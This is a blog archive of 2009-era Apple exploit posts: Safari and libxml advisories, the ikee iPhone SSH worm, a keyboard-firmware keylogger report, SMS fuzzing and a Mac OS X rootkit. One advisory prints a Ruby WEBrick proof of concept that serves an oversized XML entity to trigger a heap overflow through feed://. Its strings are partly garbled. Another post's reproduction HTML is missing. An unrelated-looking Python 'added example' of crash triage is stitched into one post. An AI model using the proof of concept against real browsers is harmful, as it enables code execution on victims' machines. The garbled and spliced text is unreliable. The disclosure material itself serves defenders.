Category Archives: Exploits

Apple Exploits

APPLE iOS 4.0.2 Update for iPhone and iPod touch & 3.2.2 Update for iPad

Filed under Apple Updates, Exploits, iPad, iPhone, iTouch

Apple has released an update to fix comex’s recent .pdf exploit used by jailbreakme.com to jailbreak iDevices.

You must use iTunes to update your device. This update is not available through Apple Software Update.

For more information on the security update, see the Apple Security Updates web site: http://support.apple.com/kb/HT1222

iPhone SSH worms making the rounds

Filed under Exploits, News, Vulnerabilities

updated 9.11.09

More variants of iPhone malware are showing up, some claiming to gather personal data from phones. With the source code for ikee circulating, don’t be surprised if more nefarious malware follows soon.

JailBroken phone w/ alpine default pswd = pwned phone or a honeypot ;)

iPhone ikee Virus


In the past week or so at least four variants of simple worms that look for default ssh passwords on jailbroken iPhones and replace the background screen have turned up. The one in the Netherlands is asking users to paypal 5 € to have it fixed.

JD has an interview with the Australian author, ikee, and two versions of the source code are available for research purposes. This variant scans a list of subnets for exploitable iPhones and pwns them, replacing the background image with a custom one.

Affected users are iPhone users that have jailbroken their phones and NOT changed their default ssh password of alpine. Take a look here at Saurik’s page with detailed instructions on changing your ssh password.

Hijacking Safari 4 Top Sites with Phish Bombs

Filed under Exploits, News, Vulnerabilities

It is possible for a malicious website to place arbitrary sites into your Top Sites view through automated actions. The attack technique makes use of javascript windows, wherein a small window is used to repeatedly browse to different sites that the attacker wants to add to your Top Sites list. This window is completely hidden using the window.blur function, and the user won’t know what is happening in the background. Please note that this attack is not possible using invisible iframes, as Safari does not use iframe urls to decide Top Sites content.

For the complete vulnerability report and POC visit: http://securethoughts.com

CrashWrangler – Apple’s !exploitable

Filed under Apple Updates, Exploits, News, Vulnerabilities

Apple recently released the new CrashWrangler tools, which are available to anyone with a free ADC account at:
https://connect.apple.com/cgi-bin/WebObjects/MemberSite.woa/wa/getSoftware?bundleID=20390

CrashWrangler is a set of developer tools that help in creating and debugging secure Mac OS X applications. The tools work by inspecting the application’s state at the time of the crash, as well as the application crash logs. Using these tools on a reproducible test case can determine if a crash could lead to a potentially exploitable security issue, while providing valuable data to fix these issues. Additionally, any crash log can be inspected to determine if it is a duplicate of a known crash. The CrashWrangler tools support Mac OS X 10.5 or later.

It should be understood that CrashWrangler uses advanced heuristics, but that false positives and false negatives are possible. It’s intended for quick assessment. As always, a detailed manual inspection is the only way to be sure something is or isn’t exploitable.

The basic algorithm for determining exploitability looks like this.

Exploitable if:
- Crash on write instruction
- Crash executing invalid address
- Crash calling an invalid address
- Crash accessing an uninitialized or freed pointer, as indicated by using the MallocScribble environment variable
- Illegal instruction exception
- Abort due to -fstack-protector, _FORTIFY_SOURCE, or detected heap corruption
- Stack trace of crashing thread contains certain functions such as malloc, free, szone_error, objc_msgSend, etc.

Not exploitable if:
- Divide by zero exception
- Stack grows too large due to recursion
- Null dereference
- Other abort
- Crash on read instruction

If a crash is determined to be non-exploitable, it’s recommended to run the test case again with libgmalloc(3) on, with MALLOC_ALLOW_READS and MALLOC_FILL_SPACE set, and see if the crash changes to one that is considered to be exploitable.
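The triage rules above, re-implemented as an added example (this is not Apple’s CrashWrangler code): classify() applies the Exploitable / Not exploitable rules to a parsed crash record, and rerun_env() returns the libgmalloc(3) re-run the text recommends. The CrashInfo fields, the rule precedence and the sample crashes are constructed assumptions for illustration.

```python
"""CrashWrangler-style exploitability triage (added example, not Apple's code).
Encodes the Exploitable / Not exploitable rules quoted above over a small
CrashInfo record.  The record fields, the rule precedence and the sample
crashes below are constructed assumptions for illustration."""
from dataclasses import dataclass, field

# Frames whose presence on the crashing thread points at allocator or runtime
# corruption; the page gives these as examples ("etc."), so the set is partial.
SUSPICIOUS_FRAMES = ("malloc", "free", "szone_error", "objc_msgsend")
# Abort causes treated as exploitable: a hardening check fired.
HARDENING_ABORTS = ("stack_protector", "fortify_source", "heap_corruption")
NULL_PAGE = 0x1000  # assumption: a fault below the first page is a null dereference


@dataclass
class CrashInfo:
    exception: str                # EXC_BAD_ACCESS, EXC_BAD_INSTRUCTION, EXC_ARITHMETIC, SIGABRT
    access: str = ""              # for EXC_BAD_ACCESS: "read", "write", "exec" or "call"
    fault_addr: int = 0
    stack_overflow: bool = False  # fault hit the guard page of a runaway recursion
    scribbled: bool = False       # fault address is a MallocScribble fill pattern
    abort_reason: str = ""        # for SIGABRT: which check aborted, if known
    backtrace: list = field(default_factory=list)


def classify(c):
    """Return (verdict, reason); verdict is "exploitable" or "not_exploitable".

    Precedence is an assumption (the page lists the rules unordered): null and
    stack-overflow faults are ruled out first, then the exploitable rules, then
    the remaining not-exploitable rules."""
    if c.exception == "EXC_BAD_ACCESS":
        if c.stack_overflow:
            return "not_exploitable", "stack grows too large due to recursion"
        if c.fault_addr < NULL_PAGE:
            return "not_exploitable", "null dereference"
    if c.scribbled:
        return "exploitable", "access via uninitialized or freed pointer (MallocScribble)"
    if c.exception == "SIGABRT" and c.abort_reason in HARDENING_ABORTS:
        return "exploitable", "abort from %s check" % c.abort_reason
    if c.exception == "EXC_BAD_INSTRUCTION":
        return "exploitable", "illegal instruction exception"
    hits = [f for f in c.backtrace if any(s in f.lower() for s in SUSPICIOUS_FRAMES)]
    if hits:
        return "exploitable", "crashing thread is inside " + hits[0]
    if c.exception == "EXC_BAD_ACCESS":
        if c.access == "write":
            return "exploitable", "crash on write instruction"
        if c.access == "exec":
            return "exploitable", "crash executing invalid address"
        if c.access == "call":
            return "exploitable", "crash calling an invalid address"
        return "not_exploitable", "crash on read instruction"
    if c.exception == "EXC_ARITHMETIC":
        return "not_exploitable", "divide by zero exception"
    return "not_exploitable", "other abort"


def rerun_env(verdict):
    """Environment for the libgmalloc(3) re-run the text recommends after a
    non-exploitable verdict; libgmalloc is loaded via DYLD_INSERT_LIBRARIES."""
    if verdict == "exploitable":
        return {}
    return {"DYLD_INSERT_LIBRARIES": "/usr/lib/libgmalloc.dylib",
            "MALLOC_ALLOW_READS": "1", "MALLOC_FILL_SPACE": "1"}


# Constructed samples modelled on the two crash reports quoted on this page
# (Safari SIGBUS at address 2; PubSubAgent SIGSEGV with eax=0x41414141).
SAFARI_SIGBUS = CrashInfo("EXC_BAD_ACCESS", access="read", fault_addr=0x2,
                          backtrace=["WebCore::FrameLoader::load", "-[WebView reload:]"])
PUBSUB_WRITE = CrashInfo("EXC_BAD_ACCESS", access="write", fault_addr=0x05050500,
                         backtrace=["xmlParseAttValueComplex", "xmlParseStartTag"])
HEAP_READ = CrashInfo("EXC_BAD_ACCESS", access="read", fault_addr=0x41414141,
                      backtrace=["szone_free", "free", "CFRelease"])

if __name__ == "__main__":
    for name, crash in (("safari", SAFARI_SIGBUS), ("pubsub", PUBSUB_WRITE), ("heap", HEAP_READ)):
        verdict, why = classify(crash)
        print(name, verdict, "-", why, rerun_env(verdict))
```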

CrashWrangler does not send any data about your crash to Apple or anyone else. Note that it does forward the information about the crash to CrashReporter, which is part of the OS, and as always it will send info to Apple if and only if you click the “Send to Apple” button in the Crash Reporter dialog.

Apple keyboard firmware based keylogger hack

Filed under Exploits, News, Vulnerabilities

Apple’s keyboards have 8Kb of flash memory and 256 bytes of RAM. K. Chen has found a way to very easily install keyloggers, rootkits or other malicious code right inside an Apple keyboard. K. Chen presented his findings at this year’s Black Hat conference.

It’s actually quite easy to abuse the flash memory and RAM in Apple keyboards, thanks to Apple’s HIDFirmwareUpdaterTool, which is used to update the firmware in HID devices, among which is the Apple keyboard. “The tool is run, a breakpoint set, and then you simply cut and paste the new code into the firmware image in memory. That’s it,” SemiAccurate explains. Nothing is encrypted or decrypted, and it’s all very simple to do. Resume the HIDFirmwareUpdaterTool, and a few seconds later, your keyboard is compromised. Rebooting won’t help, you can’t pull any batteries, and it’s impossible to detect.

In practical terms you can abuse the RAM available in keyboards and in any other device, and there are many Apple firmware updates available for all kinds of devices: graphics cards, keyboards, trackpads, Bluetooth, EFI, SuperDrive, AirPort products, Time Capsule, etc.

Apple iPhone SMS hack

Filed under Exploits, Vulnerabilities, iPhone

iPhone security expert Charlie Miller of Independent Security Evaluators (ISE), along with colleague Collin Mulliner, demonstrated a vulnerability in the SMS messaging system which can ultimately lead to hacking of an iPhone. Miller and Mulliner released their paper “Fuzzing the Phone in your Phone” at Black Hat last week. Other hackers identified similar flaws in the Android and Windows Mobile operating systems, though no complete exploits were demonstrated. However, security researchers Zane Lackey and Luis Miras also demonstrated that the vulnerability can affect any GSM phone, though exactly how each phone reacts to the vulnerability differs.

The problem stems from the SMS system: phones have to accept SMS messages, and these security experts have found that carefully crafted messages can be interpreted as binary instructions instead of text. Some phones may see a scrambled message—the iPhone, for instance, will show a text with just a square—or may see nothing at all. Lackey and Miras showed an exploit for a Sony Ericsson phone that simply showed the message, “New settings received. Install?” The user might easily assume the data is from a legitimate source.

Miller wrote a “non-malicious” exploit for the SMS bug on the iPhone that demonstrated that Miller could take over the device, though he stopped short of actually doing so. “What I actually demoed showed that I could get to the point I could do anything I wanted,” he told Ars over the phone. “I didn’t want to show actual malicious code, but if I wanted to, I could steal contact info or passwords, dial the phone, send other SMS messages, anything.”

Google has already patched the vulnerability that Miller identified in Android, and Apple released their iPhone OS 3.0.1 update the day after Miller’s Black Hat presentation. Other phone operating systems would also need to be patched to fix the problem.

Miller said that users shouldn’t be worried yet—that is unless Apple and other vendors are slow to release patches. “Probably nothing is going to happen for at least a week,” Miller said. “What I gave out at Black Hat wasn’t enough to actually just turn around and write malware. It took me about two and a half weeks for me to write all the code for my exploit, so it would take some time to be able to duplicate that.”

Dino Dai Zovi presents Machiavelli – Another POC rootkit for Mac OS X

Filed under Exploits, News, Vulnerabilities

At the Black Hat security conference last week, security researcher Dino Dai Zovi presented a proof-of-concept rootkit that runs on Apple’s Mac OS X operating system, underscoring the fact that all software has flaws. Dai Zovi’s proof-of-concept rootkit is called Machiavelli, a reference to the Mach kernel that underpins Mac OS X.

“Machiavelli consists of a Mach proxy server on the local controlling host and a number of remote agent servers that run on remote compromised hosts,” Dai Zovi explains in a technical paper that describes his work. “On the controlling host, rootkit management utilities obtain a proxy Mach port from the proxy server and use it just as a normal application would use a local Mach port.”

With his presentation complete, Dai Zovi plans soon to release several Mac software tools related to his research on his Web site. These include: Inject Bundle, for data injection; iChatSpy, code for logging instant messages; SSLSpy, for logging SSL traffic; iSightSpy, for capturing a single frame from any Apple iSight camera; Machiavelli, for remotely controlling a compromised system; and Uncloak, a rootkit identification tool.

Apple Safari 4.x JavaScript Reload Denial of Service

Filed under Exploits, News, Vulnerabilities

Apple Safari 4.x JavaScript Reload Denial of Service
___________________________________________________________________________________

Author : Marcell ‘SkyOut’ Dietl, Achim Hoffmann
Email : mail [at] marcell-dietl [dot] de
Vendor : http://www.apple.com/
Product : http://www.apple.com/safari/
Found : 12.06.2009
Released : 01.07.2009

Tested on:
– Safari 4.0 at Windows XP SP3
– Safari 4.0.1 at Mac OS X 10.5.7
___________________________________________________________________________________
STEPS TO REPRODUCE

1) Create a HTML file with the following content:

+———-
|
|
|
|
|
|
+———-

2) Create an empty file called “empty.js” in the same directory.

3) Put both files into the WWW directory of your server.

4) Access the HTML file with your browser.
– A popup will appear: Close it.
– A popup will appear: Close it.
– Crash.

5) On Windows:

+———-
| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll
| ModVer: 4.530.17.0 Offset: 00305f55
+———-

5) On Mac OS X:

+———-
| Process: Safari [298]
| Path: /Applications/Safari.app/Contents/MacOS/Safari
| Identifier: com.apple.Safari
| Version: 4.0.1 (5530.18)
| Build Info: WebBrowser-55301800~1
| Code Type: X86 (Native)
| Parent Process: launchd [163]
|
| Date/Time: 2009-07-01 00:58:48.144 +0200
| OS Version: Mac OS X 10.5.7 (9J61)
| Report Version: 6
|
| Exception Type: EXC_BAD_ACCESS (SIGBUS)
| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002
|
| Thread 0 crashed with X86 Thread State (32-bit):
| eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000
| edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0
| ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017
| ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037
| cr2: 0x00000002
+———-
___________________________________________________________________________________
Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php

Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html

Apple has been informed about the bug, but did not show any interest.
___________________________________________________________________________________
HAVING FUN WITH FULL DISCLOSURE SINCE 2006

Apple Safari 3.2.3 Vulnerability – Null pointer dereference

Filed under Exploits, News, Vulnerabilities

n.runs AG
http://www.nruns.com/ security(at)nruns.com
n.runs-SA-2009.006 23-Jun-2009
______________________________________________________________________________________________________________

Vendor: Apple Inc., http://www.apple.com
Affected Products: Safari Browser 3.2.3 all platforms
Vulnerability: Null pointer dereference leads to DoS
Risk: MEDIUM
______________________________________________________________________________________________________________

Vendor communication:

2009/06/07 Bug found
2009/06/08 Preparing PoC’s and problem description for three bug classes (n.runs-SA-2009.004 – n.runs-SA-2009.006); writing initial email
2009/06/08 Apple releases Safari 4.0 [1]
2009/06/09 Sending initial email in midnight hour (UTC/GMT +2 hours)
2009/06/09 Bot reply mail delivered; received Follow-Up ID
2009/06/09 Due to a press release n.runs is now aware of the new release; testing three PoC’s; two of them seem to be fixed
2009/06/10 Apple replies, outlining that they “take any report of a potential security issue very seriously.” Asking for PoC’s
2009/06/10 Sending all PoC’s with further description and outlining that, at the time of writing the initial email, n.runs was aware of the new Safari release. Two PoC’s (n.runs-SA-2009.005 and n.runs-SA-2009.006) are not working with the new Safari release, but asking to have a closer look into it.
2009/06/11 Apple responds that two PoC’s are not working on the latest release, so Apple doesn’t see the need for any further action. With regards to n.runs-SA-2009.004, Apple acknowledges the issue still affects Safari 4 and is looking to fix it.
2009/06/15 n.runs informs Apple to release this advisory due to time difference
2009/06/23 n.runs releases this advisory

_______________________________________________________________________

Overview:

Quoting http://www.apple.com/safari/:
“What is Safari ?
It’s a browser. It’s a platform. It’s an open invitation to innovate. Whether on a Mac, PC, iPhone, or iPod touch, Safari continuously redefines the browser, providing the most enjoyable way to experience the Internet.”

Description:

A Null Class Pointer Dereference in CoreFoundation.dll has been found while parsing a URL fragment with a high-bit character in a common protocol handler.

In detail, the following flaw was determined:

- Safari crashes in method CFCharacterSetInitInlineBuffer because the first passed pointer argument (stored in ecx) was not sanitized. Hence, when dereferencing a null pointer, Safari will crash.

Excerpt from stack trace:
CoreFoundation!CFCharacterSetInitInlineBuffer+0x357
CoreFoundation!CFURLCopyFileSystemPath+0xf3
CoreFoundation!CFURLGetWideFileSystemRepresentation+0x23
CFNetwork!CFHTTPMessageSendRequest+0x6e4
CFNetwork!CFHTTPMessageSendRequest+0x96e
CFNetwork!CFHTTPMessageSendRequest+0xad2
CFNetwork!CFURLConnectionSendSynchronousRequest+0x8d7
CFNetwork!CFStreamErrorFromCFError+0x9a0
ntdll!RtlpAllocateFromHeapLookaside+0x42
ntdll!RtlAllocateHeap+0x1c2

Impact

An attacker could trigger the vulnerability by constructing a specially prepared website. When a user views the web page, an unexpected application termination occurs.
Kindly note: Whether this circumstance leads to an exploitable condition was not investigated further.

Solution:

Apple has issued an update to correct this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document.

_______________________________________________________________________

Credit:
Bugs found by Alexios Fakos of n.runs AG.
_______________________________________________________________________

References:
[1] http://support.apple.com/kb/HT3613

This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php

< Safari 3.2.3 Arbitrary Code Execution + PoC

Filed under Exploits, News, Vulnerabilities

Advisory Author : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20090622
Product Name : Mac OS X Publication Subscription
Product Version : < Safari 3.2.3
Vendor Name : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : APPLE-SA-2009-05-12
Discovery Date : 08/2008
______________________________________________________________________________________________________________

http://www.netragard.com

[Product Description]
—————————————————————————————————
Now your favorite web browser is also the fastest on any platform. With page load speeds that outperform every other major browser on the Mac or PC, Safari also introduces a few new features to the mix.

Thanks to the built-in RSS reader in Safari, you can scan the latest news, information, and articles from thousands of websites in one simple-to-read, searchable article list that Safari assembles for you. The first browser to feature a built-in RSS reader, Safari is the ideal way to browse the entire web without using a second application.

Introduced in Mac OS X v10.5, Publication Subscription is a technology that offers developers a way to subscribe to web feeds from their applications. Web feeds are documents that contain frequently updated information. You can use Publication Subscription to allow your applications to subscribe to podcasts, photocasts, and any other feed-based document. Publication Subscription handles all the feed downloads and updates automatically. Publication Subscription technologies make use of libxml2 in order to parse RSS data.

Libxml2 is the XML C parser and toolkit developed for the Gnome project (but usable outside of Gnome), it is free software available under the MIT License. XML itself is a metalanguage used to design markup languages, i.e. text language where semantic and structure are added to the content using extra “markup” information enclosed between angle brackets.

[Technical Summary]
—————————————————————————————————
“The ‘libxml’ library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service vulnerability.”

http://www.securityfocus.com/bid/31126

Safari uses the vulnerable libxml library and can be attacked via the feed:// input vector.

[Technical Details]
—————————————————————————————————-
Libxml2 is vulnerable to a heap-based buffer overflow, caused by improper bounds checking in the xmlParseAttValueComplex() function. By parsing exceedingly long XML entity names using Libxml2, a remote attacker can overflow a buffer and execute arbitrary code on the system. If code execution fails a Denial of Service condition may happen.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529

https://bugzilla.redhat.com/show_bug.cgi?id=461015
http://rhn.redhat.com/errata/RHBA-2008-0878.html
https://bugzilla.redhat.com/show_bug.cgi?id=460396

[Proof Of Concept]
—————————————————————————————————
The following testcases allowed for the creation of the below PoC

https://bugzilla.redhat.com/attachment.cgi?id=315476
https://bugzilla.redhat.com/attachment.cgi?id=315477
https://bugzilla.redhat.com/attachment.cgi?id=315478
https://bugzilla.redhat.com/attachment.cgi?id=315479
https://bugzilla.redhat.com/attachment.cgi?id=315480
https://bugzilla.redhat.com/attachment.cgi?id=315481
https://bugzilla.redhat.com/attachment.cgi?id=315482

#!/usr/bin/ruby
#
# The application PubSubAgent quit unexpectedly.
#
# Process: PubSubAgent [3764]
# Path: /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent
# Identifier: PubSubAgent
# Version: ??? (???)
# Code Type: X86 (Native)
# Parent Process: launchd [282]
#
# Date/Time: 2008-10-31 15:31:41.355 -0400
# OS Version: Mac OS X 10.5.5 (9F33)
# Report Version: 6
#
# Exception Type: EXC_BAD_ACCESS (SIGSEGV)
# Exception Codes: KERN_INVALID_ADDRESS at 0x0000000005050500
#
# Thread 0 crashed with X86 Thread State (32-bit):
# eax: 0x41414141 ebx: 0x94580535 ecx: 0x00136150 edx: 0x05050500
# edi: 0x00007000 esi: 0x00100000 ebp: 0xbfffe298 esp: 0xbfffe220
# ss: 0x0000001f efl: 0x00010206 eip: 0x94580605 cs: 0x00000017
# ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037
# cr2: 0x05050500

require 'webrick'
include WEBrick

XML_LOVE =
‘ + “\n” +
‘ '‘ + “\n” +
"A" * 1000 + " " +
'"ha"> ]>’ + “\n” +
';">text‘ + “\n”

REDIR_LOVE =

s = HTTPServer.new( :Port => 80 )

class REDIRECT < HTTPServlet::AbstractServlet
def do_GET(req, res)
res.body = REDIR_LOVE
res['Content-Type'] = "text/html"
end
end

class XMLLOVER < HTTPServlet::AbstractServlet
def do_GET(req, res)
res.body = XML_LOVE
res['Content-Type'] = "text/xml"
end
end

s.mount("/", REDIRECT)
s.mount("/pwn", XMLLOVER)

trap("INT"){ s.shutdown }
s.start

[Fix]
---------------------------------------------------------------------------------------------------
https://bugzilla.redhat.com/attachment.cgi?id=315291
http://lists.apple.com/archives/security-announce/2009/May/msg00000.html

[Vendor Status]
—————————————————————————————————
Vendor Notified

[Vendor Comments]
—————————————————————————————————
Safari 3.2.3 is now available and addresses the following:

libxml
CVE-ID: CVE-2008-3529
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista
Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution
Description: A heap buffer overflow exists in libxml’s handling of long entity names. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Safari 3.2.3 is included in the Mac OS X v10.5.7 update. Safari 3.2.3 on Mac OS X requires either Mac OS X v10.5.7, or Mac OS X v10.4.11 with Security Update 2009-002 installed.

Apple Safari 3.2.3 Vulnerability – Information disclosure

Filed under Exploits, News, Vulnerabilities

n.runs AG
http://www.nruns.com security(at)nruns.com
n.runs-SA-2009.005 23-Jun-2009
_____________________________________________________________________________________________________________

Vendor: Apple Inc., http://www.apple.com
Affected Products: Safari Browser 3.2.3 all platforms
Vulnerability: Information disclosure to Denial of Service
Risk: MEDIUM
_____________________________________________________________________________________________________________

Vendor communication:

2009/06/07 Bug found
2009/06/08 Preparing PoC’s and problem description for three bug classes (n.runs-SA-2009.004 – n.runs-SA-2009.006); writing initial email
2009/06/08 Apple releases Safari 4.0 [1]
2009/06/09 Sending initial email in midnight hour (UTC/GMT +2 hours)
2009/06/09 Bot reply mail delivered; received Follow-Up ID
2009/06/09 Due to a press release n.runs is now aware of the new release; testing three PoC’s; two of them seem to be fixed
2009/06/10 Apple replies, outlining that they “take any report of a potential security issue very seriously.” Asking for PoC’s
2009/06/10 Sending all PoC’s with further description and outlining that, at the time of writing the initial email, n.runs was aware of the new Safari release. Two PoC’s (n.runs-SA-2009.005 and n.runs-SA-2009.006) are not working with the new Safari release, but asking to have a closer look into it.
2009/06/11 Apple responds that two PoC’s are not working on the latest release, so Apple doesn’t see the need for any further action. With regards to n.runs-SA-2009.004, Apple acknowledges the issue still affects Safari 4 and is looking to fix it.
2009/06/15 n.runs informs Apple to release this advisory due to time difference
2009/06/23 n.runs releases this advisory
_______________________________________________________________________

Overview:

Quoting http://www.apple.com/safari/:
“What is Safari ? It’s a browser. It’s a platform. It’s an open invitation to innovate. Whether on a Mac, PC, iPhone, or iPod touch, Safari continuously redefines the browser, providing the most enjoyable way to experience the Internet.”

Description:

Passing the file protocol handler to a certain HTML tag allows local files to be read. On Windows it is possible to create an instance of Windows Explorer by calling an executable file. Other operating systems were not tested.

In detail, the following flaw was determined:

- Safari fails to sanitize the file protocol handler, thus leading to an information disclosure, e.g. local file theft. Dynamically creating a certain HTML tag and using a valid file path to an executable may lead to a Denial of Service condition.

Impact

An attacker could trigger the vulnerability by constructing a specially prepared html file. When a user views this file, local content can be sent to a third party. Additionally, various ghost instances of Windows Explorer may harm the stability of the user’s system.

Solution:

Apple has issued an update to correct this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document.

_______________________________________________________________________

Credit: Bugs found by Alexios Fakos of n.runs AG.
_______________________________________________________________________

References:
[1] http://support.apple.com/kb/HT3613

This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php

iPhone OS 2.1 Safari phone-auto-dial vulnerability

Filed under Exploits, News, Vulnerabilities

http://www.mulliner.org/security/advisories/iphone_safari_phone-auto-dial_vulnerability_advisory.txt

Video of vulnerability